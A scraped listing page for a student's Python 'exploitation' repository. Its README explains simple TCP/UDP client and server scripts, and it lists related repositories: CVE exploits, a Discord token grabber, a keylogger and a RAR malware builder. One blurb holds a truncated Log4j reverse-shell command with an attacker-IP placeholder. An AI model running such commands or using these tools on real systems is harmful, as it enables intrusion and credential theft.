This is a repository filled with scripts that were made with Python, and designed to exploit computer systems.

Related tags

Security related resourcesPYTHON-EXPLOITATION
Overview

PYTHON-EXPLOITATION

This is a repository filled with scripts that were made with Python, and designed to exploit computer systems.

Networking

tcp_clinet.py

The tcp_clinet.py script is used to push data to a server in the event that you are not able to use the typical networking tools. In the script we:

  • Create a socket object (line 8): the AF_INET parameter indicates we will use a standard IPv4 address or hostname, and SOCK_STREAM indicates that this will be a TCP client.
  • Connect to the client server (line 11): note that, since we are using a TCP client, we must first connect to our server (via the TCP handshake) to send data to it.
  • Send the server some data in bytes (line 14)
  • Recieve data back from the server and print out the response (line 17)

    Note that this script makes numerous assumptions about the server we are engaging with:

  • It assumes that our connection will always succeed as it does not have a fallback function in the event that the server rejects our connection.
  • It assumes that the server expects us to send data first. Sometimes, the server will want to send us data first - this is especially true if the server is being guarded by a firewall of some kind.
  • The script assumes that the server will always return data to us in a timely fashion.

    The assumptions are made for simplicity's sake. All things considered, sometimes less is more.

    udp_client.py

    Our udp_client.py script is much different from our tcp script, only that it it configured to send data via the user datagram protocol (but that much was obvious):

    • We change the socket type to SOCK_DGRAM to indicate that we will be using sending data via the UDP (line 6).
    • Also, notice that there is no connect() method beforehand, since we do not need to connect to a server beforehand using UDP. This is because UDP is a connectionaless protocol.
    • The last step is to call the recvfrom() method to receive UDP data back. This returns both the data and the details of the remote host and port (line 9).

    tcp_server.py

    The tcp_server.py is just that, a multi-threaded python TCP server that we can use in the event we want to write a command shell or craft a proxy.

    • Firstly, we pass in the IP address and port we want the server to listen on (line 9).
    • Next, we tell the server to simply start listening with a max backlog of connections set to 5 (line 10). Now ther server waits for a connection.
    • Once the clinet connects, we get the client socket in the client variable and the remote connection details in teh address variable.
    • We tehn start the thread to handle the client connection (line 17).
    • The handle_client function performs rec() and then sens a simple message back to the client.
    • Owner
    Nathan Galindo
    Hi, my name is Nathan Galindo and I am a cybersecurity student at Baylor University!
    Nathan Galindo
    GitHub Repository
    CVE-log4j CheckMK plugin

    CVE-2021-44228-log4j discovery (Download the MKP package) This plugin discovers vulnerable files for the CVE-2021-44228-log4j issue. To discover this

    4 Jan 08, 2022
    Exploit-CVE-2021-21086

    CVE-2021-21086 Exploit This exploit allows to execute a shellcode in the context of the rendering process of Adobe Acrobat Reader DC 2020.013.20074β€―an

    Faraday 23 Nov 09, 2022
    CVE-2021-22205& GitLab CE/EE RCE

    Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files tha

    Al1ex 213 Dec 30, 2022
    A repository to detect the ARP spoofing in any devices and prevent Man in the Middle(MITM) attack using Python3

    arp_spoof_detector A repository to detect the ARP spoofing in any devices and prevent Man in the Middle(MITM) attack using Python3 Usage: git clone ht

    Surya Das N 1 Oct 30, 2021
    IDA plugin for quickly copying disassembly as encoded hex bytes

    HexCopy IDA plugin for quickly copying disassembly as encoded hex bytes. This whole plugin just saves you two extra clicks... but if you are frequentl

    OALabs 46 Oct 30, 2022
    Used to build an XSS platform on the command line.

    pyXSSPlatform Used to build an XSS platform on the command line. Usage: 1.generate the cert file You can use openssl like this: openssl req -new -x509

    70 Jun 21, 2022
    A Tool to find subdomains from hackerone reports.

    Hactivity A Tool to find subdomains from Hackerone reports of a given company or a search term (xss, ssrf, etc). It can also print out URL and Title o

    Stinger 15 Jul 24, 2022
    Make files with as many random bytes as you want

    Lots o' Bytes πŸ”£ Make files with as many random bytes as you want! Use case Can be used to package malware that is normally small by making the downlo

    Addi 1 Jan 13, 2022
    Security system to prevent Shoulder Surfing Attacks

    Surf_Sec Security system to prevent Shoulder Surfing Attacks. REQUIREMENTS: Python 3.6+ XAMPP INSTALLED METHOD TO CONFIGURE PROJECT: Clone the repo to

    Aman Anand 1 Jan 27, 2022
    Hack computer in the form of RAR files from all types of clients, even Linux

    Program Features πŸ“Œ Hide malware πŸ“Œ Vulnerability software vulnerabilities RAR πŸ“Œ Creating malware πŸ“Œ Access client files πŸ“Œ Client Hacking πŸ“Œ Link Do

    hack4lx 5 Nov 25, 2022
    Bypass's HCaptcha by overloading their api causing it to throwback a generated uuid. (Released due to exposure)

    HCaptcha-Bypass Bypass's HCaptcha by overloading their api causing it to throwback a generated uuid. Not working? If it is not seeming to work for you

    Dropout 17 Aug 23, 2021
    Generate malicious files using recently published bidi-attack (CVE-2021-42574)

    CVE-2021-42574 - Code generator Generate malicious files using recently published bidi-attack vulnerability, which was discovered in Unicode Specifica

    js-on 7 Nov 09, 2022
    Huskee: Malware made in Python for Educational purposes

    π‡π”π’πŠπ„π„ Caracteristicas: Discord Token Grabber Wifi Passwords Grabber Googl

    chew 4 Aug 17, 2022
    πŸ” A simple command-line password manager.

    PassVault What Is It? It is a command-line password manager, for educational purposes, that stores localy, in AES encryption, your sensitives datas in

    5 Aug 15, 2022
    Log4j2 CVE-2021-44228 revshell

    Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At

    FaisalFs 16 Mar 24, 2022
    A local Socks5 server written in python, used for integrating Multi-hop

    proxy-Zata proxy-Zata v1.0 This is a local Socks5 server written in python, used for integrating Multi-hop (Socks4/Socks5/HTTP) forward proxy then pro

    4 Feb 24, 2022
    Auerswald COMpact 8.0B Backdoors exploit

    CVE-2021-40859 Auerswald COMpact 8.0B Backdoors exploit About Backdoors were discovered in Auerswald COMpact 5500R 7.8A and 8.0B devices, that allow a

    Ashish Kunwar 1 Nov 24, 2022
    Phoenix Framework is an environment for writing, testing and using exploit code.

    Phoenix-Framework Phoenix Framework is an environment for writing, testing and using exploit code. πŸ–Ό Screenshots πŸŽͺ Community PwnWiki Forums πŸ”‘ Licen

    Felix 42 Aug 09, 2022
    A wordlist generator tool, that allows you to supply a set of words, giving you the possibility to craft multiple variations from the given words, creating a unique and ideal wordlist to use regarding a specific target.

    A wordlist generator tool, that allows you to supply a set of words, giving you the possibility to craft multiple variations from the given words, creating a unique and ideal wordlist to use regardin

    Cycurity 39 Dec 10, 2022
    Open-source keylogger write in python

    Python open-source keylogger Language Python open-source keylogger using pynput module Using Install dependences in archive setup.py or install.sh in

    Dio brando 4 Jan 15, 2022